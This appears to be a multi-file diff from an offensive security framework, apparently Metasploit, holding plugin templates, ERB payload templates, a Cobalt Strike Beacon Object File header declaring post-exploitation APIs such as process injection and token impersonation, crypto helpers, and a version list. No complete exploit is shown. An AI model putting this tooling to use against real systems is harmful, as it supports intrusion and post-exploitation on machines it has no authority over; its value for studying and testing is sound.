+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add changelog content here
+</p>
+</body>
+</html>
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<plugin>
+   <class>com.example.openfire.plugin.Example</class>
+   <name>PLUGINNAME</name>
+   <description>PLUGINDESCRIPTION</description>
+   <author>PLUGINAUTHOR</author>
+   <version>1.0.0</version>
+   <date>7/7/2008</date>
+   <minServerVersion>3.5.0</minServerVersion>
+</plugin>
@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin readme</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add readme content here
+</p>
+</body>
+</html>
@@ -71,6 +71,8 @@
                        <B N="V"><%= arg[:value].to_s %></B>
                        <% elsif arg[:value].is_a? String %>
                        <S N="V"><%= arg[:value].encode(xml: :text) %></S>
+                        <% elsif arg[:value].is_a? Nokogiri::XML::Element %>
+                        <%= arg[:value].to_s %>
                        <% end %>
                      </MS>
                    </Obj>
@@ -8,7 +8,7 @@
  </soap:Header>
  <soap:Body>
    <m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
-      <m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
+      <m:UnresolvedEntry><%= name %></m:UnresolvedEntry>
    </m:ResolveNames>
  </soap:Body>
 </soap:Envelope>
@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
@@ -15,7 +15,7 @@
 <% end %>

 ## Module Ranking
-<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
+<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>

 **<%= items[:mod_rank_name] %>**

@@ -47,7 +47,7 @@
 <% end %>

 ## Module Traits
-<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
+<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>

 <% unless items[:mod_side_effects].empty? %>
 ### Side Effects
@@ -117,6 +117,13 @@

 <%= normalize_pull_requests(items[:mod_pull_requests]) %>

+<%- attacker_kb_references = normalize_attackerkb_references(items[:mod_refs]) %>
+<% unless attacker_kb_references.empty? %>
+## AttackerKB references
+
+<%= attacker_kb_references %>
+<% end %>
+
 <% unless items[:mod_refs].empty? %>
 ## References

@@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
 msf <%= mod.type %>(<%= mod.shortname %>) > generate
 ```

-To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
+To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).
@@ -0,0 +1,229 @@
+import copy
+import struct
+import sys
+
+
+def chunks(lst, n):
+    for i in range(0, len(lst), n):
+        yield lst[i:i + n]
+
+
+def _cw(word):
+    return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
+
+
+def _s2b(text):
+    return list(ord(c)for c in text)
+
+
+def _b2s(binary):
+    return "".join(chr(b)for b in binary)
+
+
+if sys.version_info[0] >= 3:
+    xrange = range
+
+    def _s2b(text):
+        if isinstance(text, bytes):
+            return text
+        return [ord(c)for c in text]
+
+    def _b2s(binary):
+        return bytes(binary)
+else:
+    def bytes(s, e): return s
+
+
+def _gmul(a, b):
+    r = 0
+    while b:
+        if b & 1:
+            r ^= a
+        a <<= 1
+        if a > 255:
+            a ^= 0x11B
+        b >>= 1
+    return r
+
+
+def _mix(n, vec):
+    return sum(_gmul(n, v) << (24 - 8 * shift) for shift, v in enumerate(vec))
+
+
+def _ror32(n):
+    return (n & 255) << 24 | n >> 8
+
+
+def _rcon():
+    return [_gmul(1, 1 << n) for n in range(30)]
+
+
+def _Si(S):
+    return [S.index(n) for n in range(len(S))]
+
+
+def _mixl(S, vec):
+    return [_mix(s, vec) for s in S]
+
+
+def _rorl(T):
+    return [_ror32(t) for t in T]
+
+
+empty = struct.pack('')
+
+
+class AESCBC(object):
+    nrs = {16: 10, 24: 12, 32: 14}
+    rcon = _rcon()
+    S = [
+        99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171,
+        118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156,
+        164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241,
+        113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226,
+        235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179,
+        41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57,
+        74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127,
+        80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218,
+        33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167,
+        126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238,
+        184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211,
+        172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108,
+        86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198,
+        232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246,
+        14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217,
+        142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191,
+        230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22
+    ]
+    Si = _Si(S)
+    T1 = _mixl(S, (2, 1, 1, 3))
+    T2 = _rorl(T1)
+    T3 = _rorl(T2)
+    T4 = _rorl(T3)
+    T5 = _mixl(Si, (14, 9, 13, 11))
+    T6 = _rorl(T5)
+    T7 = _rorl(T6)
+    T8 = _rorl(T7)
+    U1 = _mixl(range(256), (14, 9, 13, 11))
+    U2 = _rorl(U1)
+    U3 = _rorl(U2)
+    U4 = _rorl(U3)
+
+    def __init__(self, key):
+        if len(key)not in (16, 24, 32):
+            raise ValueError('Invalid key size')
+        rds = self.nrs[len(key)]
+        self._Ke = [[0] * 4 for i in xrange(rds + 1)]
+        self._Kd = [[0] * 4 for i in xrange(rds + 1)]
+        rnd_kc = (rds + 1) * 4
+        KC = len(key) // 4
+        tk = [struct.unpack('>i', key[i:i + 4])[0]
+              for i in xrange(0, len(key), 4)]
+        rconpointer = 0
+        t = KC
+        for i in xrange(0, KC):
+            self._Ke[i // 4][i % 4] = tk[i]
+            self._Kd[rds - (i // 4)][i % 4] = tk[i]
+        while t < rnd_kc:
+            tt = tk[KC - 1]
+            tk[0] ^= ((self.S[(tt >> 16) & 255] << 24) ^ (self.S[(tt >> 8) & 255] << 16) ^ (
+                self.S[tt & 255] << 8) ^ self.S[(tt >> 24) & 255] ^ (self.rcon[rconpointer] << 24))
+            rconpointer += 1
+            if KC != 8:
+                for i in xrange(1, KC):
+                    tk[i] ^= tk[i - 1]
+            else:
+                for i in xrange(1, KC // 2):
+                    tk[i] ^= tk[i - 1]
+                tt = tk[KC // 2 - 1]
+                tk[KC // 2] ^= (self.S[tt & 255] ^ (self.S[(tt >> 8) & 255] << 8) ^
+                                (self.S[(tt >> 16) & 255] << 16) ^ (self.S[(tt >> 24) & 255] << 24))
+                for i in xrange(KC // 2 + 1, KC):
+                    tk[i] ^= tk[i - 1]
+            j = 0
+            while j < KC and t < rnd_kc:
+                self._Ke[t // 4][t % 4] = tk[j]
+                self._Kd[rds - (t // 4)][t % 4] = tk[j]
+                j += 1
+                t += 1
+        for r in xrange(1, rds):
+            for j in xrange(0, 4):
+                tt = self._Kd[r][j]
+                self._Kd[r][j] = (self.U1[(tt >> 24) & 255] ^ self.U2[(
+                    tt >> 16) & 255] ^ self.U3[(tt >> 8) & 255] ^ self.U4[tt & 255])
+
+    def _encdec(self, data, K, s, S, L1, L2, L3, L4):
+        if len(data) != 16:
+            raise ValueError('wrong block length')
+        rds = len(K) - 1
+        (s1, s2, s3) = s
+        a = [0, 0, 0, 0]
+        t = [(_cw(data[4 * i:4 * i + 4]) ^ K[0][i])for i in xrange(0, 4)]
+        for r in xrange(1, rds):
+            for i in xrange(0, 4):
+                a[i] = L1[(t[i] >> 24) & 255]
+                a[i] ^= L2[(t[(i + s1) % 4] >> 16) & 255]
+                a[i] ^= L3[(t[(i + s2) % 4] >> 8) & 255]
+                a[i] ^= L4[t[(i + s3) % 4] & 255] ^ K[r][i]
+            t = copy.copy(a)
+        rst = []
+        for i in xrange(0, 4):
+            tt = K[rds][i]
+            rst.append((S[(t[i] >> 24) & 255] ^ (tt >> 24)) & 255)
+            rst.append((S[(t[(i + s1) % 4] >> 16) & 255] ^ (tt >> 16)) & 255)
+            rst.append((S[(t[(i + s2) % 4] >> 8) & 255] ^ (tt >> 8)) & 255)
+            rst.append((S[t[(i + s3) % 4] & 255] ^ tt) & 255)
+        return rst
+
+    def enc_in(self, pt):
+        return self._encdec(
+            pt, self._Ke, [
+                1, 2, 3], self.S, self.T1, self.T2, self.T3, self.T4)
+
+    def dec_in(self, ct):
+        return self._encdec(
+            ct, self._Kd, [
+                3, 2, 1], self.Si, self.T5, self.T6, self.T7, self.T8)
+
+    def pad(self, pt):
+        c = 16 - (len(pt) % 16)
+        return pt + bytes(chr(c) * c, 'utf-8')
+
+    def unpad(self, pt):
+        c = pt[-1]
+        if not isinstance(c, int):
+            c = ord(c)
+        return pt[:-c]
+
+    def encrypt(self, iv, pt):
+        if len(iv) != 16:
+            raise ValueError('initialization vector must be 16 bytes')
+        else:
+            self._lcb = _s2b(iv)
+        pt = self.pad(pt)
+        return empty.join([self.enc_b(b)for b in chunks(pt, 16)])
+
+    def enc_b(self, pt):
+        if len(pt) != 16:
+            raise ValueError('plaintext block must be 16 bytes')
+        pt = _s2b(pt)
+        pcb = [(p ^ l)for (p, l) in zip(pt, self._lcb)]
+        self._lcb = self.enc_in(pcb)
+        return _b2s(self._lcb)
+
+    def decrypt(self, iv, ct):
+        if len(iv) != 16:
+            raise ValueError('initialization vector must be 16 bytes')
+        else:
+            self._lcb = _s2b(iv)
+        if len(ct) % 16 != 0:
+            raise ValueError('ciphertext must be a multiple of 16')
+        return self.unpad(empty.join([self.dec_b(b)for b in chunks(ct, 16)]))
+
+    def dec_b(self, ct):
+        if len(ct) != 16:
+            raise ValueError('ciphertext block must be 16 bytes')
+        cb = _s2b(ct)
+        pt = [(p ^ l)for (p, l) in zip(self.dec_in(cb), self._lcb)]
+        self._lcb = cb
+        return _b2s(pt)
@@ -0,0 +1,77 @@
+import sys
+import math
+import random
+import binascii as ba
+import os
+from struct import unpack as u
+from struct import pack
+is2 = sys.version_info[0] < 3
+
+
+def bt(b):
+    if is2:
+        return b
+    return ord(b)
+
+
+def b2i(b):
+    return int(ba.b2a_hex(b), 16)
+
+
+def i2b(i):
+    h = '%x' % i
+    if len(h) % 2 == 1:
+        h = '0' + h
+    if not is2:
+        h = h.encode('utf-8')
+    return ba.a2b_hex(h)
+
+
+def rs(a, o):
+    if a[o] == bt(pack('B', 0x81)):
+        return (u('B', a[o + 1])[0], 2 + o)
+    elif a[o] == bt(pack('B', 0x82)):
+        return (u('>H', a[o + 1:o + 3])[0], 3 + o)
+
+
+def ri(b, o):
+    i, o = rs(b, o)
+    return (b[o:o + i], o + i)
+
+
+def b2me(b):
+    if b[0] != bt(pack('B', 0x30)):
+        return (None, None)
+    _, o = rs(b, 1)
+    if b[o] != bt(pack('B', 2)):
+        return (None, None)
+    (m, o) = ri(b, o + 1)
+    if b[o] != bt(pack('B', 2)):
+        return (None, None)
+    e = b[o + 2:]
+    return (b2i(m), b2i(e))
+
+
+def der2me(d):
+    if d[0] != bt(pack('B', 0x30)):
+        return (None, None)
+    _, o = rs(d, 1)
+    while o < len(d):
+        if d[o] == bt(pack('B', 0x30)):
+            o += u('B', d[o + 1:o + 2])[0]
+        elif d[o] == bt(pack('B', 0x05)):
+            o += 2
+        elif d[o] == bt(pack('B', 0x03)):
+            _, o = rs(d, o + 1)
+            return b2me(d[o + 1:])
+        else:
+            return (None, None)
+
+
+def rsa_enc(der, msg):
+    m, e = der2me(der)
+    h = pack('BB', 0, 2)
+    d = pack('B', 0)
+    l = 256 - len(h) - len(msg) - len(d)
+    p = os.urandom(512).replace(pack('B', 0), pack(''))
+    return i2b(pow(b2i(h + p[:l] + d + msg), e, m))
@@ -0,0 +1,2 @@
+$someText = "Hello!" ; $someText > "C:\flag.txt"
+
@@ -0,0 +1,615 @@
+[
+    "V3_0_0_SNAPSHOT",
+    "V3_0_0_ALPHA1",
+    "V3_0_0_BETA1",
+    "V3_0_0_BETA2",
+    "V3_0_0_BETA3",
+    "V3_0_0_BETA4",
+    "V3_0_0_BETA5",
+    "V3_0_0_BETA6_SNAPSHOT",
+    "V3_0_0_BETA6",
+    "V3_0_0_BETA7_SNAPSHOT",
+    "V3_0_0_BETA7",
+    "V3_0_0_BETA8_SNAPSHOT",
+    "V3_0_0_BETA8",
+    "V3_0_0_BETA9_SNAPSHOT",
+    "V3_0_0_BETA9",
+    "V3_0_0_FINAL",
+    "V3_0_1_SNAPSHOT",
+    "V3_0_1",
+    "V3_0_2_SNAPSHOT",
+    "V3_0_2",
+    "V3_0_3_SNAPSHOT",
+    "V3_0_3",
+    "V3_0_4_SNAPSHOT",
+    "V3_0_4",
+    "V3_0_5_SNAPSHOT",
+    "V3_0_5",
+    "V3_0_6_SNAPSHOT",
+    "V3_0_6",
+    "V3_0_7_SNAPSHOT",
+    "V3_0_7",
+    "V3_0_8_SNAPSHOT",
+    "V3_0_8",
+    "V3_0_9_SNAPSHOT",
+    "V3_0_9",
+    "V3_0_10_SNAPSHOT",
+    "V3_0_10",
+    "V3_0_11_SNAPSHOT",
+    "V3_0_11",
+    "V3_0_12_SNAPSHOT",
+    "V3_0_12",
+    "V3_0_13_SNAPSHOT",
+    "V3_0_13",
+    "V3_0_14_SNAPSHOT",
+    "V3_0_14",
+    "V3_0_15_SNAPSHOT",
+    "V3_0_15",
+    "V3_1_0_SNAPSHOT",
+    "V3_1_0",
+    "V3_1_1_SNAPSHOT",
+    "V3_1_1",
+    "V3_1_2_SNAPSHOT",
+    "V3_1_2",
+    "V3_1_3_SNAPSHOT",
+    "V3_1_3",
+    "V3_1_4_SNAPSHOT",
+    "V3_1_4",
+    "V3_1_5_SNAPSHOT",
+    "V3_1_5",
+    "V3_1_6_SNAPSHOT",
+    "V3_1_6",
+    "V3_1_7_SNAPSHOT",
+    "V3_1_7",
+    "V3_1_8_SNAPSHOT",
+    "V3_1_8",
+    "V3_1_9_SNAPSHOT",
+    "V3_1_9",
+    "V3_2_0_SNAPSHOT",
+    "V3_2_0",
+    "V3_2_1_SNAPSHOT",
+    "V3_2_1",
+    "V3_2_2_SNAPSHOT",
+    "V3_2_2",
+    "V3_2_3_SNAPSHOT",
+    "V3_2_3",
+    "V3_2_4_SNAPSHOT",
+    "V3_2_4",
+    "V3_2_5_SNAPSHOT",
+    "V3_2_5",
+    "V3_2_6_SNAPSHOT",
+    "V3_2_6",
+    "V3_2_7_SNAPSHOT",
+    "V3_2_7",
+    "V3_2_8_SNAPSHOT",
+    "V3_2_8",
+    "V3_2_9_SNAPSHOT",
+    "V3_2_9",
+    "V3_3_1_SNAPSHOT",
+    "V3_3_1",
+    "V3_3_2_SNAPSHOT",
+    "V3_3_2",
+    "V3_3_3_SNAPSHOT",
+    "V3_3_3",
+    "V3_3_4_SNAPSHOT",
+    "V3_3_4",
+    "V3_3_5_SNAPSHOT",
+    "V3_3_5",
+    "V3_3_6_SNAPSHOT",
+    "V3_3_6",
+    "V3_3_7_SNAPSHOT",
+    "V3_3_7",
+    "V3_3_8_SNAPSHOT",
+    "V3_3_8",
+    "V3_3_9_SNAPSHOT",
+    "V3_3_9",
+    "V3_4_1_SNAPSHOT",
+    "V3_4_1",
+    "V3_4_2_SNAPSHOT",
+    "V3_4_2",
+    "V3_4_3_SNAPSHOT",
+    "V3_4_3",
+    "V3_4_4_SNAPSHOT",
+    "V3_4_4",
+    "V3_4_5_SNAPSHOT",
+    "V3_4_5",
+    "V3_4_6_SNAPSHOT",
+    "V3_4_6",
+    "V3_4_7_SNAPSHOT",
+    "V3_4_7",
+    "V3_4_8_SNAPSHOT",
+    "V3_4_8",
+    "V3_4_9_SNAPSHOT",
+    "V3_4_9",
+    "V3_5_1_SNAPSHOT",
+    "V3_5_1",
+    "V3_5_2_SNAPSHOT",
+    "V3_5_2",
+    "V3_5_3_SNAPSHOT",
+    "V3_5_3",
+    "V3_5_4_SNAPSHOT",
+    "V3_5_4",
+    "V3_5_5_SNAPSHOT",
+    "V3_5_5",
+    "V3_5_6_SNAPSHOT",
+    "V3_5_6",
+    "V3_5_7_SNAPSHOT",
+    "V3_5_7",
+    "V3_5_8_SNAPSHOT",
+    "V3_5_8",
+    "V3_5_9_SNAPSHOT",
+    "V3_5_9",
+    "V3_6_1_SNAPSHOT",
+    "V3_6_1",
+    "V3_6_2_SNAPSHOT",
+    "V3_6_2",
+    "V3_6_3_SNAPSHOT",
+    "V3_6_3",
+    "V3_6_4_SNAPSHOT",
+    "V3_6_4",
+    "V3_6_5_SNAPSHOT",
+    "V3_6_5",
+    "V3_6_6_SNAPSHOT",
+    "V3_6_6",
+    "V3_6_7_SNAPSHOT",
+    "V3_6_7",
+    "V3_6_8_SNAPSHOT",
+    "V3_6_8",
+    "V3_6_9_SNAPSHOT",
+    "V3_6_9",
+    "V3_7_1_SNAPSHOT",
+    "V3_7_1",
+    "V3_7_2_SNAPSHOT",
+    "V3_7_2",
+    "V3_7_3_SNAPSHOT",
+    "V3_7_3",
+    "V3_7_4_SNAPSHOT",
+    "V3_7_4",
+    "V3_7_5_SNAPSHOT",
+    "V3_7_5",
+    "V3_7_6_SNAPSHOT",
+    "V3_7_6",
+    "V3_7_7_SNAPSHOT",
+    "V3_7_7",
+    "V3_7_8_SNAPSHOT",
+    "V3_7_8",
+    "V3_7_9_SNAPSHOT",
+    "V3_7_9",
+    "V3_8_1_SNAPSHOT",
+    "V3_8_1",
+    "V3_8_2_SNAPSHOT",
+    "V3_8_2",
+    "V3_8_3_SNAPSHOT",
+    "V3_8_3",
+    "V3_8_4_SNAPSHOT",
+    "V3_8_4",
+    "V3_8_5_SNAPSHOT",
+    "V3_8_5",
+    "V3_8_6_SNAPSHOT",
+    "V3_8_6",
+    "V3_8_7_SNAPSHOT",
+    "V3_8_7",
+    "V3_8_8_SNAPSHOT",
+    "V3_8_8",
+    "V3_8_9_SNAPSHOT",
+    "V3_8_9",
+    "V3_9_1_SNAPSHOT",
+    "V3_9_1",
+    "V3_9_2_SNAPSHOT",
+    "V3_9_2",
+    "V3_9_3_SNAPSHOT",
+    "V3_9_3",
+    "V3_9_4_SNAPSHOT",
+    "V3_9_4",
+    "V3_9_5_SNAPSHOT",
+    "V3_9_5",
+    "V3_9_6_SNAPSHOT",
+    "V3_9_6",
+    "V3_9_7_SNAPSHOT",
+    "V3_9_7",
+    "V3_9_8_SNAPSHOT",
+    "V3_9_8",
+    "V3_9_9_SNAPSHOT",
+    "V3_9_9",
+    "V4_0_0_SNAPSHOT",
+    "V4_0_0",
+    "V4_0_1_SNAPSHOT",
+    "V4_0_1",
+    "V4_0_2_SNAPSHOT",
+    "V4_0_2",
+    "V4_0_3_SNAPSHOT",
+    "V4_0_3",
+    "V4_0_4_SNAPSHOT",
+    "V4_0_4",
+    "V4_0_5_SNAPSHOT",
+    "V4_0_5",
+    "V4_0_6_SNAPSHOT",
+    "V4_0_6",
+    "V4_0_7_SNAPSHOT",
+    "V4_0_7",
+    "V4_0_8_SNAPSHOT",
+    "V4_0_8",
+    "V4_0_9_SNAPSHOT",
+    "V4_0_9",
+    "V4_1_0_SNAPSHOT",
+    "V4_1_0",
+    "V4_1_1_SNAPSHOT",
+    "V4_1_1",
+    "V4_1_2_SNAPSHOT",
+    "V4_1_2",
+    "V4_1_3_SNAPSHOT",
+    "V4_1_3",
+    "V4_1_4_SNAPSHOT",
+    "V4_1_4",
+    "V4_1_5_SNAPSHOT",
+    "V4_1_5",
+    "V4_1_6_SNAPSHOT",
+    "V4_1_6",
+    "V4_1_7_SNAPSHOT",
+    "V4_1_7",
+    "V4_1_8_SNAPSHOT",
+    "V4_1_8",
+    "V4_1_9_SNAPSHOT",
+    "V4_1_9",
+    "V4_2_0_SNAPSHOT",
+    "V4_2_0",
+    "V4_2_1_SNAPSHOT",
+    "V4_2_1",
+    "V4_2_2_SNAPSHOT",
+    "V4_2_2",
+    "V4_2_3_SNAPSHOT",
+    "V4_2_3",
+    "V4_2_4_SNAPSHOT",
+    "V4_2_4",
+    "V4_2_5_SNAPSHOT",
+    "V4_2_5",
+    "V4_2_6_SNAPSHOT",
+    "V4_2_6",
+    "V4_2_7_SNAPSHOT",
+    "V4_2_7",
+    "V4_2_8_SNAPSHOT",
+    "V4_2_8",
+    "V4_2_9_SNAPSHOT",
+    "V4_2_9",
+    "V4_3_0_SNAPSHOT",
+    "V4_3_0",
+    "V4_3_1_SNAPSHOT",
+    "V4_3_1",
+    "V4_3_2_SNAPSHOT",
+    "V4_3_2",
+    "V4_3_3_SNAPSHOT",
+    "V4_3_3",
+    "V4_3_4_SNAPSHOT",
+    "V4_3_4",
+    "V4_3_5_SNAPSHOT",
+    "V4_3_5",
+    "V4_3_6_SNAPSHOT",
+    "V4_3_6",
+    "V4_3_7_SNAPSHOT",
+    "V4_3_7",
+    "V4_3_8_SNAPSHOT",
+    "V4_3_8",
+    "V4_3_9_SNAPSHOT",
+    "V4_3_9",
+    "V4_4_0_SNAPSHOT",
+    "V4_4_0",
+    "V4_4_1_SNAPSHOT",
+    "V4_4_1",
+    "V4_4_2_SNAPSHOT",
+    "V4_4_2",
+    "V4_4_3_SNAPSHOT",
+    "V4_4_3",
+    "V4_4_4_SNAPSHOT",
+    "V4_4_4",
+    "V4_4_5_SNAPSHOT",
+    "V4_4_5",
+    "V4_4_6_SNAPSHOT",
+    "V4_4_6",
+    "V4_4_7_SNAPSHOT",
+    "V4_4_7",
+    "V4_4_8_SNAPSHOT",
+    "V4_4_8",
+    "V4_4_9_SNAPSHOT",
+    "V4_4_9",
+    "V4_5_0_SNAPSHOT",
+    "V4_5_0",
+    "V4_5_1_SNAPSHOT",
+    "V4_5_1",
+    "V4_5_2_SNAPSHOT",
+    "V4_5_2",
+    "V4_5_3_SNAPSHOT",
+    "V4_5_3",
+    "V4_5_4_SNAPSHOT",
+    "V4_5_4",
+    "V4_5_5_SNAPSHOT",
+    "V4_5_5",
+    "V4_5_6_SNAPSHOT",
+    "V4_5_6",
+    "V4_5_7_SNAPSHOT",
+    "V4_5_7",
+    "V4_5_8_SNAPSHOT",
+    "V4_5_8",
+    "V4_5_9_SNAPSHOT",
+    "V4_5_9",
+    "V4_6_0_SNAPSHOT",
+    "V4_6_0",
+    "V4_6_1_SNAPSHOT",
+    "V4_6_1",
+    "V4_6_2_SNAPSHOT",
+    "V4_6_2",
+    "V4_6_3_SNAPSHOT",
+    "V4_6_3",
+    "V4_6_4_SNAPSHOT",
+    "V4_6_4",
+    "V4_6_5_SNAPSHOT",
+    "V4_6_5",
+    "V4_6_6_SNAPSHOT",
+    "V4_6_6",
+    "V4_6_7_SNAPSHOT",
+    "V4_6_7",
+    "V4_6_8_SNAPSHOT",
+    "V4_6_8",
+    "V4_6_9_SNAPSHOT",
+    "V4_6_9",
+    "V4_7_0_SNAPSHOT",
+    "V4_7_0",
+    "V4_7_1_SNAPSHOT",
+    "V4_7_1",
+    "V4_7_2_SNAPSHOT",
+    "V4_7_2",
+    "V4_7_3_SNAPSHOT",
+    "V4_7_3",
+    "V4_7_4_SNAPSHOT",
+    "V4_7_4",
+    "V4_7_5_SNAPSHOT",
+    "V4_7_5",
+    "V4_7_6_SNAPSHOT",
+    "V4_7_6",
+    "V4_7_7_SNAPSHOT",
+    "V4_7_7",
+    "V4_7_8_SNAPSHOT",
+    "V4_7_8",
+    "V4_7_9_SNAPSHOT",
+    "V4_7_9",
+    "V4_8_0_SNAPSHOT",
+    "V4_8_0",
+    "V4_8_1_SNAPSHOT",
+    "V4_8_1",
+    "V4_8_2_SNAPSHOT",
+    "V4_8_2",
+    "V4_8_3_SNAPSHOT",
+    "V4_8_3",
+    "V4_8_4_SNAPSHOT",
+    "V4_8_4",
+    "V4_8_5_SNAPSHOT",
+    "V4_8_5",
+    "V4_8_6_SNAPSHOT",
+    "V4_8_6",
+    "V4_8_7_SNAPSHOT",
+    "V4_8_7",
+    "V4_8_8_SNAPSHOT",
+    "V4_8_8",
+    "V4_8_9_SNAPSHOT",
+    "V4_8_9",
+    "V4_9_0_SNAPSHOT",
+    "V4_9_0",
+    "V4_9_1_SNAPSHOT",
+    "V4_9_1",
+    "V4_9_2_SNAPSHOT",
+    "V4_9_2",
+    "V4_9_3_SNAPSHOT",
+    "V4_9_3",
+    "V4_9_4_SNAPSHOT",
+    "V4_9_4",
